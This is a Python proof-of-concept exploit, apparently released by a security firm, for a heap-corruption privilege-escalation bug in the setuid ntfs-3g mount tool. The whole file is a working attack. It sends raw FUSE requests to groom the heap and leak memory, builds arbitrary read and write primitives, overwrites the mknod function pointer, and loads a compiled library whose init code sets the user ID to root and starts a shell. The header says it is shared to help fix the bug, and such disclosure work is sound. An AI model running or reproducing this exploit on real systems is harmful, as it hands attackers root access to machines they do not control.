#!/usr/bin/python3 -BbbEIsSttW all
"""This software is provided by the copyright owner "as is"
and WITHOUT ANY EXPRESSED OR IMPLIED WARRANTIES, including,
but not limited to, the implied warranties of merchantability
and fitness for a particular purpose are disclaimed. In no
event shall the copyright owner be liable for any direct,
indirect, incidental, special, exemplary or consequential
damages, including, but not limited to, procurement of substitute
goods or services, loss of use, data or profits or business
interruption, however caused and on any theory of liability,
whether in contract, strict liability, or tort, including
negligence or otherwise, arising in any way out of the use
of this software, even if advised of the possibility of such
damage.

Copyright (c) 2022 Unparalleled IT Services e.U.
https://unparalleled.eu/blog/2022/20220607-help-to-heap-suid-privilege-escalation/

The software is only provided for reference to ease understanding
and fixing of an underlying security issue in "ntfs-3g".
Therefore it may NOT be distributed freely while the security
issue is not fixed and patched software is available widely.
After that phase permission to use, copy, modify, and distribute
this software according to GNU Lesser General Public License
(LGPL-3.0) purpose is hereby granted, provided that the above
copyright notice and this permission notice appear in all
copies.

This program demonstrates how to exploit the userspace file
system mount tool "ntfs-3g" using the "--help" option."""


import os
import socket
import struct
import subprocess
import sys
import time


def buildFuseHeader(command, nodeId):
  """Return the 40 byte fuse request header.

  Layout (little endian): 4 zero bytes, the 32 bit opcode, the
  constant b'AAAAAAAA', the 64 bit node ID, 12 zero bytes and the
  trailing constant b'qqqq'."""
  return struct.pack(
      '<4sI8sQ12s4s',
      bytes(4), command, b'A' * 8, nodeId, bytes(12), b'qqqq')

def unpackLong(data, offset):
  """Convenience method returning the little endian unsigned 64 bit
  value stored in data at the given offset.
  @raises struct.error when fewer than 8 bytes are available there."""
  (value,) = struct.unpack('<Q', data[offset:offset + 8])
  return value

def packLong(value):
  """Return value encoded as a little endian unsigned 64 bit value.
  @raises struct.error when value does not fit into 64 bits."""
  return struct.Struct('<Q').pack(value)

def getMem(memData, memStart, address, length):
  """Return the bytes at a given address taken from a block of
  memory, or None when the requested range is not fully inside it.
  @param memData the memory data block.
  @param memStart the address of the first byte of memData.
  @param address the address to extract data from.
  @param length the number of bytes to extract."""
  begin = address - memStart
  end = begin + length
  if begin >= 0 and end <= len(memData):
    return memData[begin:end]
  return None


class ExploitContext:
  """State of one ntfs-3g child process plus the raw FUSE request
  helpers used by this program.

  Most request helpers send a raw FUSE request (a header built by
  buildFuseHeader() followed by an opcode specific payload) over
  self.fuseSocket and read the reply with a single recv() call of
  at most 64 KiB."""

  def __init__(self):
    """Set all state to None; ntfs3gInit() and runExploit() fill in
    the fields."""
# Our end of the socket pair; the other end is passed to ntfs-3g as
# its stdin and carries the fuse protocol communication.
    self.fuseSocket = None
# Keep the reference to one file for truncating and writing,
# see readMemory().
    self.fileNodeId = None
# Value returned by FUSE_OPENDIR on node 1; used as the directory
# handle argument of FUSE_READDIR requests.
    self.heapReadDirHandleAddress = None
# Content pointer found by getDirHandleMemory(); stored only.
    self.heapReadDirContentAddress = None
# Distance from heapStartAddess to that content pointer; readHeap()
# passes its negation as FUSE_READDIR offset.
    self.heapReadDirContentOffset = None
# Address that readMemory() assigns to the first byte returned by
# readHeap(). (The attribute name misspells "Address".)
    self.heapStartAddess = None
# Memory block extracted by getDirHandleMemory(); stored only.
    self.heapData = None
# Pointer read at offset 0x28 of the leaked directory handle
# structure; presumably the address of libfuse's "struct fuse".
    self.fuseStructAddress = None
# The running ntfs-3g subprocess.Popen object, or None.
    self.ntfs3gProcess = None
# This table stores the file names with suitable inode numbers:
# inodeTable[b] is the hex name of a subdirectory of "Dir" whose
# READDIR reply starts with byte b, see buildInodeTable().
    self.inodeTable = None

  def ntfs3gInit(self):
    """Start /bin/ntfs-3g with the "--help,no_detach" options to
    mount "image" on "mnt". One end of a fresh socket pair becomes
    its stdin; the other end is kept in self.fuseSocket.
    @raises Exception if a process is already running."""
    if self.ntfs3gProcess is not None:
      raise Exception()
    self.fuseSocket, childSocket = socket.socketpair()
    self.ntfs3gProcess = subprocess.Popen(
        ['/bin/ntfs-3g', '-o', '--help,no_detach', 'image', 'mnt'],
        stdin=childSocket.fileno())
# The child has its own copy of this descriptor as stdin now.
    childSocket.close()

  def ntfs3gClose(self):
    """Close our socket end and wait for ntfs-3g to exit."""
    self.fuseSocket.close()
    self.fuseSocket = None
    self.ntfs3gProcess.wait()
    self.ntfs3gProcess = None

  def lookupNode(self, name):
    """Lookup, return nodeid.
    @param name the name to look up below node 1 (callers also
    pass paths like b'Dir/1f').
    @return the 64 bit value following the 16 byte reply header,
    or None when the reply is only 16 bytes long (presumably an
    error reply without payload)."""
# FUSE_LOOKUP 1
    self.fuseSocket.send(buildFuseHeader(1, 1) + name + b'\x00')
    result = self.fuseSocket.recv(1<<16)
    if len(result) == 16:
      return None
    return unpackLong(result, 16)

  def truncateNode(self, nodeId, length):
    """Set the size of the given node to length; the reply is read
    and discarded."""
# FUSE_SETATTR 4
# Payload: valid mask 8 (presumably FATTR_SIZE) plus 4 padding
# bytes, 8 zero bytes (presumably the file handle), the new size.
    self.fuseSocket.send(
        buildFuseHeader(4, nodeId) +
        b'\x08\x00\x00\x00\x00\x00\x00\x00' + b'\x00' * 8 + packLong(length))
    self.fuseSocket.recv(1<<16)

# FUSE_MKDIR 9
  def fuseMkdir(self, nodeId, name):
    """Create directory name below nodeId; the 8 parameter bytes
    before the name are all zero.
    @return the reply without its 16 byte header."""
    self.fuseSocket.send(
        buildFuseHeader(9, nodeId) +
        b'\x00\x00\x00\x00\x00\x00\x00\x00' + name + b'\x00')
    return self.fuseSocket.recv(1<<16)[16:]

# FUSE_RMDIR 11
  def rmdir(self, nodeId, name):
    """Remove directory name below nodeId.
    @return the raw reply including its header."""
    self.fuseSocket.send(
        buildFuseHeader(0xb, nodeId) + name + b'\x00')
    return self.fuseSocket.recv(1<<16)

  def writeNode(self, nodeId, offset, length, data):
    """Write data to the given node.
    @param offset the file offset to write at.
    @param length the length announced in the request.
    @param data the payload; it is sent completely, even when it
    is longer than length.
    @raises Exception if data is shorter than length.
    @return the raw reply including its header."""
# FUSE_WRITE 16
    if len(data) < length:
      raise Exception()
# Payload: an 8 byte field with value 0xff (presumably the file
# handle), offset and length as 64 bit values, then the data.
    self.fuseSocket.send(
        buildFuseHeader(0x10, nodeId) + \
        b'\xff\x00\x00\x00\x00\x00\x00\x00' + \
        struct.pack('<QQ', offset, length) + data)
    return self.fuseSocket.recv(1<<16)

  def fuseSetXAttr(self, nodeId):
    """Set the system.ntfs_object_id=ABC extended attribute on
    the given node.

    The value actually sent is b'ABC' repeated 0x40 times plus a
    NUL byte; the reply is printed. runExploit() uses this call
    to shape the heap."""
# FUSE_SETXATTR 21
# b'BBBB' and four zero bytes fill the fixed fields in front of the
# attribute name. NOTE(review): presumably the size and flags fields
# of the setxattr request - confirm.
    self.fuseSocket.send(
        buildFuseHeader(0x15, nodeId) + \
        b'BBBB' + b'\x00' * 4 + b'system.ntfs_object_id\x00' + b'ABC' * 0x40 + b'\x00')
    print('FUSE_SETXATTR result %s' % repr(self.fuseSocket.recv(1<<16)))

  def fuseInit(self):
    """Send FUSE_INIT for node 0 with a fixed 4 byte payload and
    print the reply."""
# FUSE_INIT 26
    self.fuseSocket.send(
        buildFuseHeader(0x1a, 0) + b'\x08\x00\t\x00')
    print('Result %s' % repr(self.fuseSocket.recv(1<<16)))

  def openDir(self, nodeId):
    """Open the given directory node.
    @return the 64 bit value right after the 16 byte reply header.
    runExploit() treats it as the address of the directory
    handle."""
# FUSE_OPENDIR 27
    self.fuseSocket.send(
        buildFuseHeader(0x1b, nodeId))
    fuseReply = self.fuseSocket.recv(1<<16)
    return unpackLong(fuseReply, 16)

  def fuseReadDir(self, nodeId, dirHandleAddress, offset, length):
    """Read directory data of nodeId through the given directory
    handle value.
    @param offset packed as a signed 64 bit value, so negative
    offsets are possible (see readHeap()).
    @return the reply without its 16 byte header."""
# FUSE_READDIR 28
    self.fuseSocket.send(
        buildFuseHeader(0x1c, nodeId) + \
        struct.pack('<qqq', dirHandleAddress, offset, length))
    return self.fuseSocket.recv(1<<16)[16:]

  def fuseCreate(self, name, dirNodeId):
    """Create a file on the image.

    Creates name in directory dirNodeId and prints the reply. The
    second payload word 0x81a4 equals 0o100644, presumably the mode
    of a regular rw-r--r-- file."""
# FUSE_CREATE 35:
    self.fuseSocket.send(
        buildFuseHeader(0x23, dirNodeId) + \
        b'\xff\x05\x00\x00\xa4\x81\x00\x00' + name + b'\x00')
    print('FUSE_CREATE result %s' % repr(self.fuseSocket.recv(1<<16)))

  def buildInodeTable(self, path):
    """Build a table containing one entry per inode LSB.

    Subdirectories of path named 0, 1, 2, ... (hexadecimal) are
    looked up, and created when missing, until 256 distinct first
    bytes of their FUSE_READDIR replies have been seen. Afterwards
    self.inodeTable[b] holds the first number whose subdirectory
    produced byte b.
    NOTE(review): loops forever if fewer than 256 distinct values
    ever show up, and raises IndexError on an empty reply."""
    dirNodeId = self.lookupNode(path)
    nodeDict = {}
    nameId = 0
    while len(nodeDict) != 0x100:
      nodeId = self.lookupNode(b'%s/%x' % (path, nameId))
      if nodeId is None:
        self.fuseMkdir(dirNodeId, b'%x' % nameId)
        nodeId = self.lookupNode(b'%s/%x' % (path, nameId))
# The READDIR goes through the handle opened on node 1; only the
# first reply byte is used.
      inodeInfo = self.fuseReadDir(
          nodeId, self.heapReadDirHandleAddress, 0, 0x400)
# Keep only the first name seen for each byte value.
      if inodeInfo[0] not in nodeDict:
        nodeDict[inodeInfo[0]] = nameId
      nameId += 1
    self.inodeTable = [nodeDict[x] for x in range(0, 256)]

  def readHeap(self):
    """Read through the node 1 directory handle with the negated
    heapReadDirContentOffset as offset and heapReadDirContentOffset
    as length. The result is presumably the memory from
    heapStartAddess up to the directory content buffer.
    @return the reply payload; readMemory() treats its first byte
    as located at self.heapStartAddess."""
    heapData = self.fuseReadDir(
        1, self.heapReadDirHandleAddress,
        0 - self.heapReadDirContentOffset, self.heapReadDirContentOffset)
    return heapData

  def readMemory(self, address, length, readOffset=1, nodeId=1):
    """Read memory at address through a fake directory handle.

    The fake handle is written into the data of self.fileNodeId,
    located in the data returned by readHeap() and then passed as
    directory handle to FUSE_READDIR.
    @param address the address to read from.
    @param length the number of bytes requested.
    @param readOffset when not 0, only read is performed.
    Otherwise memory may be overwritten first.
    @param nodeId the directory node ID to read from.
    @return the FUSE_READDIR reply payload.
    @raises Exception when fuseStructAddress is not known yet or
    the fake structure is not found in the heap data."""
    if self.fuseStructAddress is None:
      raise Exception()

# Build a fake "struct fuse_dh" entry: the fuse structure pointer at
# offset 0x28, the content pointer (address - readOffset) at offset
# 0x38, four 32 bit fields (length + readOffset twice, 0, readOffset)
# and 16 zero bytes.
    fakeDirData = b'\x00' * 0x28 + packLong(self.fuseStructAddress) + \
        b'\x00' * 8 + packLong(address - readOffset) + \
        struct.pack(
            '<IIIIQQ', length + readOffset, length + readOffset,
            0, readOffset, 0, 0)
# Replace the file contents with the fake entry. NOTE(review): this
# relies on the written data showing up in the readHeap() range.
    self.truncateNode(self.fileNodeId, 0)
    self.writeNode(self.fileNodeId, 0x40, 0x80, fakeDirData + (b'A' * 0x80))

# Search the heap copy for the fake entry to learn its address.
    allMem = self.readHeap()
    writeDataOffset = allMem.find(fakeDirData)
    if writeDataOffset == -1:
      raise Exception('No readback')
    writeDataAddress = self.heapStartAddess + writeDataOffset
# Use the fake entry as directory handle; reading at readOffset
# presumably starts exactly at address.
    memData = self.fuseReadDir(
        nodeId, writeDataAddress, readOffset, length)
    return memData


  def getDirHandleMemory(self, dirHandleAddress):
    """Extract the memory in front of the directory content buffer
    of the given handle and try to locate the handle in it.

    FUSE_READDIR probes are sent at negative offsets below the data
    collected so far, starting with 0x4000 byte steps. When no reply
    arrives, the step is halved; the search ends when the step size
    reaches 0. Successful chunks are prepended to the real directory
    data.
    @param dirHandleAddress the value returned by openDir(); also
    the structure address searched for.
    @return a tuple (memStart, contentAddress, memData). When a word
    in memData matches the content pointer of the handle (structure
    offset 0x38), memStart is the absolute address of memData[0] and
    contentAddress that pointer. Otherwise contentAddress is None and
    memStart is the offset of memData[0] relative to the content
    buffer, or None when no probe succeeded."""
    memStart = None
    contentAddress = None
    nextStep = 0x4000
    memData = realDirData = self.fuseReadDir(1, dirHandleAddress, 0, 0x400)
# Do not block, we will not see any response for invalid memory
# addresses.
    self.fuseSocket.setblocking(False)
    offset = -nextStep
# Loop invariant: offset + nextStep == memStart after the first
# successful probe, and == 0 before it.
    while nextStep != 0:
# NOTE(review): 0x100 bytes are requested but nextStep bytes are
# expected back, and the 15 trailing bytes are sent verbatim; the
# reasons are not visible here.
      self.fuseSocket.send(
          buildFuseHeader(0x1c, 1) + \
          struct.pack('<qqq', dirHandleAddress, offset, 0x100) + \
          b'\x01\x00\x00\x00AAAAAAAAAAA')
# Sleep a little while.
      time.sleep(0.1)
      dirData = b''
      try:
        dirData = self.fuseSocket.recv(1<<16)[16:]
      except:
# Deliberate: no reply on the non-blocking socket means the probe
# failed. NOTE(review): the bare except also hides any other error.
        pass
      if dirData == b'':
# No reply: halve the step, moving offset up by the same amount.
        delta = int((nextStep + 1) / 2)
        offset += delta
        nextStep -= delta
        continue
      if dirData == realDirData:
# We reread the real directory data from the NTFS image, this
# should never happen here.
        raise Exception('Unexpected memory state')
      if len(dirData) < nextStep:
# NOTE(review): offset and nextStep stay unchanged, so the same
# probe is simply retried.
        print('Wrong length read %d vs %d' % (len(dirData), nextStep))
        continue
# Prepend the chunk and continue below it with the same step size.
      memData = dirData[:nextStep] + memData
      memStart = offset
      offset -= nextStep

    self.fuseSocket.setblocking(True)
    print('* returning 0x%x bytes' % len(memData))
# Here offset == memStart (or 0 if no probe succeeded), so
# offset + pos is the position of memData[pos] relative to the
# content buffer.
    for pos in range(0, len(memData) - 7):
      contentAddress = unpackLong(memData, pos)
# If this directory entry is the one we are using for reading,
# then the offset has to be the difference between the contentAddress
# and this position. 0x38 is the contentAddress field offset
# in the directory structure.
      testAddress = contentAddress + offset + pos - 0x38
      if testAddress == dirHandleAddress:
        print('Maybe struct match dir 0x%x with content 0x%x test 0x%x' % (
            dirHandleAddress, contentAddress, testAddress))
        return (contentAddress + memStart, contentAddress, memData)
    return (memStart, None, memData)

  def writeMemory(self, targetAddress, targetData):
    """Write targetData plus a short tail to the given address.

    One byte is written per round. For byte b, the subdirectory
    Dir/<inodeTable[b] in hex> is passed as node to readMemory()
    with readOffset 0 at the current address, which then advances
    by one. Requires self.inodeTable from buildInodeTable()."""
    while targetData:
      nodeId = self.lookupNode(b'Dir/%x' % self.inodeTable[targetData[0]])
# This memory read will first write the data in "fuse_add_dirent"
# as readOffset is 0.
      self.readMemory(targetAddress, 0x40, 0, nodeId=nodeId)
      targetAddress += 1
      targetData = targetData[1:]


  def initExploit(self):
    """Initialize the directory structure, NTFS image and helper
    library to run the exploit. The exploit has to be run with
    the working directory writable by the current user.

    Creates "mnt" if needed and recreates the 2 MiB file "image".
    Formats it as NTFS containing "Dir" and "File", then builds
    /tmp/s.so (with the object file s.o in the working directory).
    Finally calls runExploit() once; with no inode table yet, that
    run only builds the table."""
    if not os.path.exists('mnt'):
      os.mkdir('mnt')

    if os.path.exists('image'):
      os.unlink('image')

    iFile = open('image', 'wb')
    iFile.write(b'\x00' * (1 << 21))
    iFile.close()
# Format the image, then mount it with ntfs-3g to create "Dir" and
# "File", and unmount it again.
    subprocess.check_call([
        '/bin/sh', '-c',
        '/sbin/mkfs.ntfs --force image && /bin/ntfs-3g image mnt && ' + \
            'mkdir mnt/Dir && touch mnt/File && umount mnt'])

# Rebuild the helper library. Its _init() function calls
# setresuid(0, 0, 0) and then executes /bin/sh.
    if os.path.exists('/tmp/s.so'):
      os.unlink('/tmp/s.so')
    subprocess.run(
        'gcc -Wall -fPIC -x c -o s.o -c -'.split(' '),
        check=True,
        input=bytes("""#define _GNU_SOURCE
#include <unistd.h>
extern void _init() {
    setresuid(0, 0, 0);
    char* args[2];
    args[0]="/bin/sh";
    args[1]=NULL;
    execve(args[0], args, NULL);
}""", 'ascii'))
# Link the object file into the shared object /tmp/s.so.
    subprocess.check_call(
        'ld -shared -Bdynamic s.o -o /tmp/s.so'.split(' '))
# This is the first run, so build the inode table without really
# executing the payload.
    self.runExploit()


  def runExploit(self):
    """Run the exploit code. This requires an appropriate NTFS
    image with crafted inode numbers to be available. If the
    image is not ready yet, all required inodes are created and
    the function terminates without attempting exploitation as
    after those operations the heap is in a really bad shape.

    "Not ready" is detected by self.inodeTable still being None."""
# Start ntfs-3g and perform the FUSE_INIT exchange.
    self.ntfs3gInit()
    self.fuseInit()

# Have a file node reference for heap spraying.
    self.fileNodeId = self.lookupNode(b'File')

# Massage the heap to appropriate shape.
    self.fuseSetXAttr(self.fileNodeId)
    self.fuseCreate(b'XXXYYYYY', 1)

# The FUSE_OPENDIR reply value is used as directory handle address.
    self.heapReadDirHandleAddress = dirHandleAddress = self.openDir(1)
    print('OPENDIR: Address dirhandle 0x%x' % dirHandleAddress)
    self.fuseReadDir(1, dirHandleAddress, 0, 0x4000)

# First run: only create the inode table directories, then stop.
    if self.inodeTable is None:
      self.buildInodeTable(b'Dir')
      self.ntfs3gClose()
      return

    memStart, contentAddress, memData = self.getDirHandleMemory(
        dirHandleAddress)
    print(
        'Assuming heap start at 0x%x with 0x%x bytes data extracted' % (
            memStart, len(memData)))
    if contentAddress is None:
      raise Exception()
# Read the fuse structure pointer at offset 0x28 of the handle.
    dirStructOffset = dirHandleAddress - memStart
    dirStructData = memData[dirStructOffset:dirStructOffset+0x60]
    fuseStructAddress = unpackLong(dirStructData, 0x28)

    self.heapReadDirContentAddress = contentAddress
    self.heapReadDirContentOffset = contentAddress - memStart
    self.heapStartAddess = memStart
    self.heapData = memData
    self.fuseStructAddress = fuseStructAddress

# Follow the pointers within the extracted memory: fuse_fs at 0x108
# of the fuse structure, the mknod operation at 0x10 of fuse_fs.
# NOTE(review): getMem() returns None (and unpackLong then fails)
# when a structure lies outside memData.
    fuseFsAddress = unpackLong(
        getMem(memData, memStart, fuseStructAddress, 0x110), 0x108)
    print('Got fuse_fs address 0x%x.' % fuseFsAddress)

    mknodFunctionAddress = unpackLong(
        getMem(memData, memStart, fuseFsAddress, 0x80), 0x10)
    print('Got mknod op: 0x%x' % mknodFunctionAddress)
    mknodFunctionPtrAddress = fuseFsAddress + 0x10
# Cross-check readMemory() against the value already known.
    checkData = self.readMemory(mknodFunctionPtrAddress, 0x8)
    if checkData != packLong(mknodFunctionAddress):
      raise Exception()

# Replace the mknod pointer with a fixed offset from its old value.
# NOTE(review): 0x14b7 is specific to one ntfs-3g build; per the
# variable name it points at reparse plugin selection code.
    selectReparsePluginAddress = packLong(mknodFunctionAddress + 0x14b7)
    self.writeMemory(
        mknodFunctionPtrAddress, selectReparsePluginAddress)
    checkData = self.readMemory(mknodFunctionPtrAddress, 0x8)
    if selectReparsePluginAddress != checkData:
      raise Exception('Update to function address failed')
# Finally call mknod and load the shared library.
# FUSE_MKNOD 8
    self.fuseSocket.send(
        buildFuseHeader(0x8, 1) + \
        b'\xff\x05\x00\x00\xa4\x81\x00\x00' + b'tmp/s.so\x00')

# The privileged process is just a subprocess of this process
# so forward our stdin data to it.
# NOTE(review): at EOF readline() returns '' and this loop keeps
# spinning until a send fails.
    print('Type shell commands:')
    while True:
      try:
        line = sys.stdin.readline()
        self.fuseSocket.send(bytes(line, 'utf-8'))
      except BrokenPipeError:
        self.ntfs3gClose()
        break




def main():
  """Program entry point: create a context, prepare the image and
  helper library (initExploit), then run the exploit (runExploit)."""
  exploitContext = ExploitContext()
  for step in (exploitContext.initExploit, exploitContext.runExploit):
    step()

if __name__ == '__main__':
  main()
